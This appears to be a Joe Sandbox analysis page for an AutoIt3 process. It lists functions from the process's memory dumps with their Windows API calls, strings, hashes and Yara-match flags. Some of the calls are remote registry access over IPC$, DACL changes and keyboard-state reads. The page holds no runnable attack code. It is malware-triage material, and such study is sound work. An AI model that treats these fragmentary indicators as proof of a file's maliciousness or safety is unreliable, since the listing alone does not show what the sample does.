^ ERROR , xrefs: 00CAA391

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 51f84da928641f541e2354d5ffbc096b5862cd3e084b7fac2015b0e85725d736
Instruction ID: b98e4eb391c70956337007782a5cf1b33d205f83910940e3826010ed6b9eb516
Opcode Fuzzy Hash: 51f84da928641f541e2354d5ffbc096b5862cd3e084b7fac2015b0e85725d736
Instruction Fuzzy Hash: BD51857190020AAACF15EBE0CD4AFEEB779EF08341F140165F905B2151EB356F98EB65

Function 00CA0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C8F8B8,00000001,0000138C,00000001,00000000,00000001,?,00CB3FF9,00000000), ref: 00CA009A
LoadStringW.USER32(00000000,?,00C8F8B8,00000001), ref: 00CA00A3

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

GetModuleHandleW.KERNEL32(00000000,00D07310,?,00000FFF,?,?,00C8F8B8,00000001,0000138C,00000001,00000000,00000001,?,00CB3FF9,00000000,00000001), ref: 00CA00C5
LoadStringW.USER32(00000000,?,00C8F8B8,00000001), ref: 00CA00C8
__swprintf.LIBCMT ref: 00CA0118
__swprintf.LIBCMT ref: 00CA0129
_wprintf.LIBCMT ref: 00CA01D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA01E9

Strings

^ ERROR, xrefs: 00CA017E
Line %d:, xrefs: 00CA0123
%s (%d) : ==> %s: %s %s, xrefs: 00CA01CD
Line %d (File "%s"):, xrefs: 00CA0112
Error: , xrefs: 00CA01A0

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 700e49cf7f1059fb6d40280658334344f4c8a112d28a250b0f12117b0a7029a4
Instruction ID: 413653d0f0de3d3eb0409aa5d267df32aeb489cd08070e6e6e58d032637fc886
Opcode Fuzzy Hash: 700e49cf7f1059fb6d40280658334344f4c8a112d28a250b0f12117b0a7029a4
Instruction Fuzzy Hash: E0416371800219AACF14EBE0CD8AFEEB778AF15341F640125FD05A2092EA316F48DB65

Function 00CAA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C44D37: __itow.LIBCMT ref: 00C44D62
Part of subcall function 00C44D37: __swprintf.LIBCMT ref: 00C44DAC

CharLowerBuffW.USER32(?,?), ref: 00CAAA0E
GetDriveTypeW.KERNEL32 ref: 00CAAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CAAB08

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

Strings

close cd wait, xrefs: 00CAAAF3
type cdaudio alias cd wait, xrefs: 00CAAA86
set cd door , xrefs: 00CAAAA9
wait, xrefs: 00CAAAC5
open, xrefs: 00CAAA35
closed, xrefs: 00CAAA22, 00CAAA2B
close, xrefs: 00CAAA14
open , xrefs: 00CAAA6A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: e51832e7fa9f42ef9f4e4466bed10836cf8d3c1113cb99691fadd47c40bb6c8e
Instruction ID: ae23799f6add5ec243c368ef4514a22fb455c9466716211cc1ea687d6a0cfb41
Opcode Fuzzy Hash: e51832e7fa9f42ef9f4e4466bed10836cf8d3c1113cb99691fadd47c40bb6c8e
Instruction Fuzzy Hash: 7E518A751043059FC704EF20C881A6AB7F4FF88758F14496DF895972A2DB31EE09DB92

Function 00CAA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CAA852
__swprintf.LIBCMT ref: 00CAA874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00CAA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CAA8D6
_memset.LIBCMT ref: 00CAA8F5
_wcsncpy.LIBCMT ref: 00CAA931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CAA966
CloseHandle.KERNEL32(00000000), ref: 00CAA971
RemoveDirectoryW.KERNEL32(?), ref: 00CAA97A
CloseHandle.KERNEL32(00000000), ref: 00CAA984

Strings

:, xrefs: 00CAA895
\, xrefs: 00CAA88A
\??\%s, xrefs: 00CAA86E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: cbc6b658d1b8ada35ec7d180f236f1794ed0a91d9f946e998c091acdef0c6030
Instruction ID: 79a1e5c37f7a23d185225f9e85a89f1d8d7a0f7e46eadb266fef5561f6961a58
Opcode Fuzzy Hash: cbc6b658d1b8ada35ec7d180f236f1794ed0a91d9f946e998c091acdef0c6030
Instruction Fuzzy Hash: 09318E7150021AABDB219FA4DC49FEF73BCEF89704F2041A6F519D21A0E7749744CB25

Function 00CCC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00CC982C,?,?), ref: 00CCC0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC0F7
GlobalLock.KERNEL32(00000000), ref: 00CCC100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC10F
GlobalUnlock.KERNEL32(00000000), ref: 00CCC118
CloseHandle.KERNEL32(00000000,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CC982C,?,?,00000000,?), ref: 00CCC130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CD3C7C,?), ref: 00CCC149
GlobalFree.KERNEL32(00000000), ref: 00CCC159
GetObjectW.GDI32(00000000,00000018,?), ref: 00CCC17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00CCC1A8
DeleteObject.GDI32(00000000), ref: 00CCC1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CCC1E6

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: d10121e714ed8023434d7375be6841103cdfbc9bfa99de5d2cefcfa81226b18d
Instruction ID: effc9635a0bec2ccfa6e0b633b4a95a6bfc7194e4c1e5c247368a0ca740c9348
Opcode Fuzzy Hash: d10121e714ed8023434d7375be6841103cdfbc9bfa99de5d2cefcfa81226b18d
Instruction Fuzzy Hash: D0414B71501204EFCB119F69DC8CFAEBBB8EF89711F244059F919E7260D7309A41DB60

Function 00CCC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C429E2: GetWindowLongW.USER32(?,000000EB), ref: 00C429F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CCC8A4
GetFocus.USER32 ref: 00CCC8B4
GetDlgCtrlID.USER32(00000000), ref: 00CCC8BF
_memset.LIBCMT ref: 00CCC9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CCCA15
GetMenuItemCount.USER32(?), ref: 00CCCA35
GetMenuItemID.USER32(?,00000000), ref: 00CCCA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CCCA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CCCAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CCCAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CCCB31

Strings

0, xrefs: 00CCC9E2

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: ca1f2395b3dfcbcd558d669c873215fccaf642edaeb05e8f9dca01940d31fed4
Instruction ID: 1bbed28c804fd5af1d9cd8f6f6cd4ba90cfa473f4ca9b2a8d1dee94eaa2f55f9
Opcode Fuzzy Hash: ca1f2395b3dfcbcd558d669c873215fccaf642edaeb05e8f9dca01940d31fed4
Instruction Fuzzy Hash: 79814670608301AFD710CF14D899F6BBBE8EB88354F14496EF9A997291D730DE05DBA2

Function 0472BCE8 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0472C364: GetDC.USER32(00000000), ref: 0472C3BA
Part of subcall function 0472C364: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0472C3CF
Part of subcall function 0472C364: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0472C3D9
Part of subcall function 0472C364: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0472AF1B,00000000,0472AFA7), ref: 0472C3FD
Part of subcall function 0472C364: ReleaseDC.USER32(00000000,00000000), ref: 0472C408

SelectPalette.GDI32(?,?,000000FF), ref: 0472BD2A
RealizePalette.GDI32(?), ref: 0472BD39
GetDeviceCaps.GDI32(?,0000000C), ref: 0472BD4B
GetDeviceCaps.GDI32(?,0000000E), ref: 0472BD5A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0472BD8D
SetStretchBltMode.GDI32(?,00000004), ref: 0472BD9B
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 0472BDB3
SetStretchBltMode.GDI32(00000000,00000003), ref: 0472BDD0
CreateCompatibleDC.GDI32(00000000), ref: 0472BE30
SelectObject.GDI32(?,?), ref: 0472BE45
SelectObject.GDI32(?,00000000), ref: 0472BEA4
DeleteDC.GDI32(00000000), ref: 0472BEB3

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 21381d9597c5c0e7bff8f17f600dd3c503583fe7b34cf63f9dd8f9a1d213c65f
Instruction ID: c346c2a28208a5daba1ad8b401d63c6278d00a77504505d1d859c1ca604d838d
Opcode Fuzzy Hash: 21381d9597c5c0e7bff8f17f600dd3c503583fe7b34cf63f9dd8f9a1d213c65f
Instruction Fuzzy Hash: 6071D4B5A00215AFEB50DFA8CE85E9EBBF8EF09304F558558B648EB351E634FD018B50

Function 00C98ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98E3C
Part of subcall function 00C98E20: GetLastError.KERNEL32(?,00C98900,?,?,?), ref: 00C98E46
Part of subcall function 00C98E20: GetProcessHeap.KERNEL32(00000008,?,?,00C98900,?,?,?), ref: 00C98E55
Part of subcall function 00C98E20: HeapAlloc.KERNEL32(00000000,?,00C98900,?,?,?), ref: 00C98E5C
Part of subcall function 00C98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C98E73

Part of subcall function 00C98EBD: GetProcessHeap.KERNEL32(00000008,00C98916,00000000,00000000,?,00C98916,?), ref: 00C98EC9
Part of subcall function 00C98EBD: HeapAlloc.KERNEL32(00000000,?,00C98916,?), ref: 00C98ED0
Part of subcall function 00C98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98916,?), ref: 00C98EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C98B2E
_memset.LIBCMT ref: 00C98B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C98B62
GetLengthSid.ADVAPI32(?), ref: 00C98B73
GetAce.ADVAPI32(?,00000000,?), ref: 00C98BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C98BCC
GetLengthSid.ADVAPI32(?), ref: 00C98BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C98BF8
HeapAlloc.KERNEL32(00000000), ref: 00C98BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C98C20
CopySid.ADVAPI32(00000000), ref: 00C98C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C98C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C98C92

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9b621ca81c9e574377d721d9421ac11508600979664a2e494b118ec208913bc2
Instruction ID: ae83bb0d2d8ab50f82bef280b957e33d724010ee1917645a57bac9487d577a33
Opcode Fuzzy Hash: 9b621ca81c9e574377d721d9421ac11508600979664a2e494b118ec208913bc2
Instruction Fuzzy Hash: C661497590120ABFDF109FA5DC49FAEBB79FF05300F14816AE925A7290DB359A09CB60

Function 00CAA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00CAA4D4

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00CAA4F6
__swprintf.LIBCMT ref: 00CAA54F
__swprintf.LIBCMT ref: 00CAA568
_wprintf.LIBCMT ref: 00CAA61E
_wprintf.LIBCMT ref: 00CAA63C

Strings

^ ERROR, xrefs: 00CAA5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 00CAA619
"%s" (%d) : ==> %s:, xrefs: 00CAA637
Line %d (File "%s"):, xrefs: 00CAA549, 00CAA562
Error: , xrefs: 00CAA5E6

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 990f1116c8fea6c41f6cb6ade7c75dcfa3f39285e1cc81cb530b05c2835932a5
Instruction ID: 75f8c2b9d5446c971c2feb46180a7167462543640c52a9fd97232c3b948cceec
Opcode Fuzzy Hash: 990f1116c8fea6c41f6cb6ade7c75dcfa3f39285e1cc81cb530b05c2835932a5
Instruction Fuzzy Hash: CF51907190020AABCF15EBE0CD4AFEEB778AF05345F140165F905A2191EB316F98EB65

Function 047281A0 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 047281B7
CreateCompatibleDC.GDI32(00000000), ref: 047281C1
GetObjectA.GDI32(?,00000018,?), ref: 047281E1
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 047281F8
GetDC.USER32(00000000), ref: 04728204
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 04728231
ReleaseDC.USER32(00000000,00000000), ref: 04728257
SelectObject.GDI32(?,?), ref: 04728272
SelectObject.GDI32(?,00000000), ref: 04728281
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 047282AD
SelectObject.GDI32(?,00000000), ref: 047282BB
SelectObject.GDI32(?,00000000), ref: 047282C9
DeleteDC.GDI32(?), ref: 047282DF
DeleteDC.GDI32(?), ref: 047282E8

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 7ad796c4c100cf03410c8c37d901a502f94817790b9bb4b2bf407f879feaec40
Instruction ID: 0ab0bbaa83de6c0ed1664c42289ea740cfb3b9223813b952a28ec5870ddef3eb
Opcode Fuzzy Hash: 7ad796c4c100cf03410c8c37d901a502f94817790b9bb4b2bf407f879feaec40
Instruction Fuzzy Hash: 34412DB1E00619AFEB50EBE8CE42FAFB7FCEB09704F514519B640E7240E675B9018B65

Function 00C983FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

_memset.LIBCMT ref: 00C98489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C984BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C984DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C984F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C98520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C98548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C98553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C98558

Strings

\IPC$, xrefs: 00C984A0
\CLSID, xrefs: 00C98440
SOFTWARE\Classes\, xrefs: 00C9842A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: de6b49ce6f0d2a6fc70c6f3069f022a770d22743919dd5cd464df2a41d5383a6
Instruction ID: 4ba39c4890e70c980f386e2406c7975738f9f107f6da8563c8a53b63eaaa636e
Opcode Fuzzy Hash: de6b49ce6f0d2a6fc70c6f3069f022a770d22743919dd5cd464df2a41d5383a6
Instruction Fuzzy Hash: 03410976C1022DABCF11EBA4DC99EEDB778FF04741F044129ED15A3161EA31AE48DB90

Function 00CA081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00CA0896
SetKeyboardState.USER32(?), ref: 00CA0901
GetAsyncKeyState.USER32(000000A0), ref: 00CA0921
GetKeyState.USER32(000000A0), ref: 00CA0938
GetAsyncKeyState.USER32(000000A1), ref: 00CA0967
GetKeyState.USER32(000000A1), ref: 00CA0978
GetAsyncKeyState.USER32(00000011), ref: 00CA09A4
GetKeyState.USER32(00000011), ref: 00CA09B2
GetAsyncKeyState.USER32(00000012), ref: 00CA09DB
GetKeyState.USER32(00000012), ref: 00CA09E9
GetAsyncKeyState.USER32(0000005B), ref: 00CA0A12
GetKeyState.USER32(0000005B), ref: 00CA0A20

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8f7d1fd1c33be641af54a1b52011c571805732bd316c4673e9b5c1903bf80673
Instruction ID: 67636cf137b95dd3fbc50512238a9c87f5356758f42ff2e2a6585be732eaef5c
Opcode Fuzzy Hash: 8f7d1fd1c33be641af54a1b52011c571805732bd316c4673e9b5c1903bf80673
Instruction Fuzzy Hash: 2E51D824A0478A29FB34DBB484157EABFB49F033C8F18459EC9D2571C3DA649B4CCBA5

Function 00C423F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C41F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C42412,?,00000000,?,?,?,?,00C41AA7,00000000,?), ref: 00C41F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C424AF
KillTimer.USER32(00000024,?,?,?,?,00C41AA7,00000000,?,?,00C41EBE,?,?), ref: 00C4254A
DestroyAcceleratorTable.USER32(00000000), ref: 00C7BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C41AA7,00000000,?,?,00C41EBE,?,?), ref: 00C7C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C41AA7,00000000,?,?,00C41EBE,?,?), ref: 00C7C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C41AA7,00000000,?,?,00C41EBE,?,?), ref: 00C7C04B
DeleteObject.GDI32(00000000), ref: 00C7C05D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
